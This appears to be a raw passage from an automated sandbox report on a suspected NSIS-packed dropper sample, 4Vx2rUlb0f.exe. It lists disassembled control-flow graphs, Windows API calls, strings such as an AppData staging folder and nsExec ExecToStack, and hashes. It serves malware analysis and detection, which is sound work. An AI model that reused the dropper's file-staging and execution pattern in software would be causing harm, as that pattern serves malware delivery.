                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                                                                                                • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                • API String ID: 1975747703-89682782
                                                                                                                                • Opcode ID: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                                                                • Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
                                                                                                                                • Opcode Fuzzy Hash: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                                                                • Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 361 402dee-402e3c GetTickCount GetModuleFileNameW call 405c25 364 402e48-402e76 call 406050 call 405a50 call 406050 GetFileSize 361->364 365 402e3e-402e43 361->365 373 402f63-402f71 call 402d8a 364->373 374 402e7c 364->374 366 403020-403024 365->366 381 402f73-402f76 373->381 382 402fc6-402fcb 373->382 376 402e81-402e98 374->376 378 402e9a 376->378 379 402e9c-402ea5 call 403242 376->379 378->379 386 402eab-402eb2 379->386 387 402fcd-402fd5 call 402d8a 379->387 384 402f78-402f90 call 403258 call 403242 381->384 385 402f9a-402fc4 GlobalAlloc call 403258 call 403027 381->385 382->366 384->382 407 402f92-402f98 384->407 385->382 412 402fd7-402fe8 385->412 391 402eb4-402ec8 call 405be0 386->391 392 402f2e-402f32 386->392 387->382 397 402f3c-402f42 391->397 410 402eca-402ed1 391->410 396 402f34-402f3b call 402d8a 392->396 392->397 396->397 403 402f51-402f5b 397->403 404 402f44-402f4e call 4064db 397->404 403->376 411 402f61 403->411 404->403 407->382 407->385 410->397 414 402ed3-402eda 410->414 411->373 415 402ff0-402ff5 412->415 416 402fea 412->416 414->397 418 402edc-402ee3 414->418 417 402ff6-402ffc 415->417 416->415 417->417 419 402ffe-403019 SetFilePointer call 405be0 417->419 418->397 420 402ee5-402eec 418->420 423 40301e 419->423 420->397 422 402eee-402f0e 420->422 422->382 424 402f14-402f18 422->424 423->366 425 402f20-402f28 424->425 426 402f1a-402f1e 424->426 425->397 427 402f2a-402f2c 425->427 426->411 426->425 427->397
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4Vx2rUlb0f.exe,00000400,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00402E1B
                                                                                                                                  • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C29
                                                                                                                                  • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C4B
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4Vx2rUlb0f.exe,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00402E67
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\4Vx2rUlb0f.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                • API String ID: 4283519449-2199243728
                                                                                                                                • Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                • Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
                                                                                                                                • Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                • Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 554 401767-40178c call 402bbf call 405a7b 559 401796-4017a8 call 406050 call 405a04 lstrcatW 554->559 560 40178e-401794 call 406050 554->560 565 4017ad-4017ae call 4062e4 559->565 560->565 569 4017b3-4017b7 565->569 570 4017b9-4017c3 call 406393 569->570 571 4017ea-4017ed 569->571 579 4017d5-4017e7 570->579 580 4017c5-4017d3 CompareFileTime 570->580 572 4017f5-401811 call 405c25 571->572 573 4017ef-4017f0 call 405c00 571->573 581 401813-401816 572->581 582 401885-4018ae call 4051af call 403027 572->582 573->572 579->571 580->579 583 401867-401871 call 4051af 581->583 584 401818-401856 call 406050 * 2 call 406072 call 406050 call 405795 581->584 596 4018b0-4018b4 582->596 597 4018b6-4018c2 SetFileTime 582->597 594 40187a-401880 583->594 584->569 616 40185c-40185d 584->616 599 402a55 594->599 596->597 598 4018c8-4018d3 CloseHandle 596->598 597->598 601 4018d9-4018dc 598->601 602 402a4c-402a4f 598->602 604 402a57-402a5b 599->604 605 4018f1-4018f4 call 406072 601->605 606 4018de-4018ef call 406072 lstrcatW 601->606 602->599 612 4018f9-40228d call 405795 605->612 606->612 612->602 612->604 616->594 618 40185f-401860 616->618 618->583
                                                                                                                                APIs
                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer,?,?,00000031), ref: 004017A8
                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer,?,?,00000031), ref: 004017CD
                                                                                                                                  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Windowlet Setup,NSIS Error), ref: 0040605D
                                                                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                  • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,74DF23A0), ref: 0040520A
                                                                                                                                  • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll$C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer$ExecToStack
                                                                                                                                • API String ID: 1941528284-1317773227
                                                                                                                                • Opcode ID: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                                                                • Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
                                                                                                                                • Opcode Fuzzy Hash: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                                                                • Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 620 4051af-4051c4 621 4051ca-4051db 620->621 622 40527b-40527f 620->622 623 4051e6-4051f2 lstrlenW 621->623 624 4051dd-4051e1 call 406072 621->624 626 4051f4-405204 lstrlenW 623->626 627 40520f-405213 623->627 624->623 626->622 628 405206-40520a lstrcatW 626->628 629 405222-405226 627->629 630 405215-40521c SetWindowTextW 627->630 628->627 631 405228-40526a SendMessageW * 3 629->631 632 40526c-40526e 629->632 630->629 631->632 632->622 633 405270-405273 632->633 633->622
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                • lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                • lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,74DF23A0), ref: 0040520A
                                                                                                                                • SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                • String ID: Completed
                                                                                                                                • API String ID: 2531174081-3087654605
                                                                                                                                • Opcode ID: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                                                                • Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
                                                                                                                                • Opcode Fuzzy Hash: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                                                                • Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 634 403027-40303e 635 403040 634->635 636 403047-403050 634->636 635->636 637 403052 636->637 638 403059-40305e 636->638 637->638 639 403060-403069 call 403258 638->639 640 40306e-40307b call 403242 638->640 639->640 644 403230 640->644 645 403081-403085 640->645 646 403232-403233 644->646 647 4031db-4031dd 645->647 648 40308b-4030d4 GetTickCount 645->648 651 40323b-40323f 646->651 649 40321d-403220 647->649 650 4031df-4031e2 647->650 652 403238 648->652 653 4030da-4030e2 648->653 657 403222 649->657 658 403225-40322e call 403242 649->658 650->652 654 4031e4 650->654 652->651 655 4030e4 653->655 656 4030e7-4030f5 call 403242 653->656 660 4031e7-4031ed 654->660 655->656 656->644 668 4030fb-403104 656->668 657->658 658->644 666 403235 658->666 663 4031f1-4031ff call 403242 660->663 664 4031ef 660->664 663->644 671 403201-40320d call 405cd7 663->671 664->663 666->652 670 40310a-40312a call 406549 668->670 676 403130-403143 GetTickCount 670->676 677 4031d3-4031d5 670->677 678 4031d7-4031d9 671->678 679 40320f-403219 671->679 680 403145-40314d 676->680 681 40318e-403190 676->681 677->646 678->646 679->660 684 40321b 679->684 685 403155-403186 MulDiv wsprintfW call 4051af 680->685 686 40314f-403153 680->686 682 403192-403196 681->682 683 4031c7-4031cb 681->683 688 403198-40319f call 405cd7 682->688 689 4031ad-4031b8 682->689 683->653 690 4031d1 683->690 684->652 691 40318b 685->691 686->681 686->685 694 4031a4-4031a6 688->694 693 4031bb-4031bf 689->693 690->652 691->681 693->670 695 4031c5 693->695 694->678 696 4031a8-4031ab 694->696 695->652 696->693
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                • String ID: ... %d%%$@
                                                                                                                                • API String ID: 551687249-3859443358
                                                                                                                                • Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                                                                • Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
                                                                                                                                • Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                                                                • Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 697 40567e-4056c9 CreateDirectoryW 698 4056cb-4056cd 697->698 699 4056cf-4056dc GetLastError 697->699 700 4056f6-4056f8 698->700 699->700 701 4056de-4056f2 SetFileSecurityW 699->701 701->698 702 4056f4 GetLastError 701->702 702->700
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                                                                • GetLastError.KERNEL32 ref: 004056D5
                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
                                                                                                                                • GetLastError.KERNEL32 ref: 004056F4
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\Desktop, xrefs: 0040567E
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                • API String ID: 3449924974-2028306314
                                                                                                                                • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                                                                                                • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 703 4063ba-4063da GetSystemDirectoryW 704 4063dc 703->704 705 4063de-4063e0 703->705 704->705 706 4063f1-4063f3 705->706 707 4063e2-4063eb 705->707 709 4063f4-406427 wsprintfW LoadLibraryExW 706->709 707->706 708 4063ed-4063ef 707->708 708->709
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                                                • wsprintfW.USER32 ref: 0040640C
                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                                                                                                • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 710 405c54-405c60 711 405c61-405c95 GetTickCount GetTempFileNameW 710->711 712 405ca4-405ca6 711->712 713 405c97-405c99 711->713 715 405c9e-405ca1 712->715 713->711 714 405c9b 713->714 714->715
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00405C72
                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
                                                                                                                                Strings
                                                                                                                                • nsa, xrefs: 00405C61
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
                                                                                                                                • "C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 00405C54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                • API String ID: 1716503409-1566987531
